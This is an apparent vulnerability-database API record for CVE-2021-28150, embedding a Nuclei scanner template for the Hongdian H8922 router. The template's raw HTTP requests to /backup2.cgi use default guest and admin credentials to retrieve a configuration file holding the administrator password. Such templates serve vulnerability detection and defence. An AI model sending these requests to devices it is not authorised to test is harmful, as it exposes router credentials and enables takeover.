{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2021-28150/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2021-28150/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2021-28150/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2021-28150/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2021-28150/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2021-28150"},"sightings":{"href":"/api/v1/sightings/cve-2021-28150"}},"data":{"nuclei":true,"nuclei_template":"http/cves/2021/CVE-2021-28150.yaml","nuclei_template_severity":"medium","nuclei_template_yaml":"id: CVE-2021-28150\n\ninfo:\n  name: Hongdian H8922 3.0.5 - Information Disclosure\n  author: gy741\n  severity: medium\n  description: Hongdian H8922 3.0.5 is susceptible to information disclosure. An attacker can access cli.conf (with the administrator password and other sensitive data) via /backup2.cgi and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n  impact: |\n    Successful exploitation of this vulnerability can lead to the exposure of sensitive data, potentially compromising the confidentiality of the system and its users.\n  remediation: |\n    Apply the latest security patch or update provided by Hongdian to fix the information disclosure vulnerability (CVE-2021-28150).\n  reference:\n    - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/\n    - http://en.hongdian.com/Products/Details/H8922\n    - https://nvd.nist.gov/vuln/detail/CVE-2021-28150\n    - https://github.com/SexyBeast233/SecBooks\n    - https://github.com/Threekiii/Awesome-POC\n  classification:\n    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 5.5\n    cve-id: CVE-2021-28150\n    cwe-id: CWE-425\n    epss-score: 0.02794\n    epss-percentile: 0.85837\n    cpe: cpe:2.3:o:hongdian:h8922_firmware:3.0.5:*:*:*:*:*:*:*\n  metadata:\n    max-request: 2\n    vendor: hongdian\n    product: h8922_firmware\n  tags: cve2021,cve,hongdian,exposure,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        GET /backup2.cgi HTTP/1.1\n        Host: {{Hostname}}\n        Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=\n      - |\n        GET /backup2.cgi HTTP/1.1\n        Host: {{Hostname}}\n        Authorization: Basic YWRtaW46YWRtaW4=\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: header\n        words:\n          - \"application/octet-stream\"\n\n      - type: word\n        part: body\n        words:\n          - \"CLI configuration saved from vty\"\n          - \"service webadmin\"\n\n      - type: status\n        status:\n          - 200\n# digest: 490a0046304402203f44e812e538163ced9007261964eaf286e1df4bcc34752d340706302cb032fe02203c3ccefa992dbe76180bb78e2b37518c1c5579fa46ad6c3df781f7503d4a840e:922c64590222798bb761d5b6d8e72950"},"source":"nuclei","vuln_id":"cve-2021-28150"}